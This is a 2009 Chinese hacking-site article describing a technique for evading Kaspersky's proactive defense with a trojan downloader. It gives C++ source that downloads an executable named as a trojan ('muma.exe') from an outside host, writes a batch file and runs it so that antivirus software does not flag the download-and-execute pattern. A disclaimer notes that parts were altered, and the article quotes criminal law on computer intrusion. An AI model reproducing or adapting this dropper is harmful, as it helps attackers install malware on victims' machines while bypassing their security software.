为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

绕过卡巴主动防御策略的下载者

2009-7-27 10:44| 投稿: security

摘要:   卡巴检测的机理是:文件下载a.exe->文件运行a.exe(判断为下载者)    新的思路:文件下载a.exe->写run.bat->运行run.bat(不判断为下载者)    ...
  卡巴检测的机理是:文件下载a.exe->文件运行a.exe(判断为下载者)    新的思路:文件下载a.exe->写run.bat->运行run.bat(不判断为下载者)    ##不提供下载,程序关键部分已经修改##    刑法第285条规定,违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。    刑法修正案(七)在刑法第285条中增加两款(第二款、第三款):    “违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。”    “提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。”    /*    Author: Friddy  Email:qianyang@ssyeah.com  QQ:568623  */    #include "stdafx.h"  #include <iostream.h>  #include <fstream.h>  #include <UrlMon.h>  #include <string.h>  #include <windows.h>  #pragma comment(lib, "urlmon.lib")    int APIENTRY WinMain(HINSTANCE hInstance,  HINSTANCE hPrevInstance,  LPSTR     lpCmdLine,  int       nCmdShow)  { char muma[]="http://www.friddy.cn/muma.exe";  // TODO: Place code here.  while(true){  HRESULT hr = URLDownloadToXXXXXXXXX(0, muma,"C:\\ma.exe", 0,NULL);  if (hr== S_OK)  {  const char filename[] = "c:\\vir.bat";  ofstream o_file;  o_file.open(filename);  o_file <<"echo off"<<endl;  o_file <<"C:\\ma.exe"<<endl;  o_file.close();  WinExec("C:\\vir.bat",0);  return 0;  Sleep(10000);  }  }  return 0;  }

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部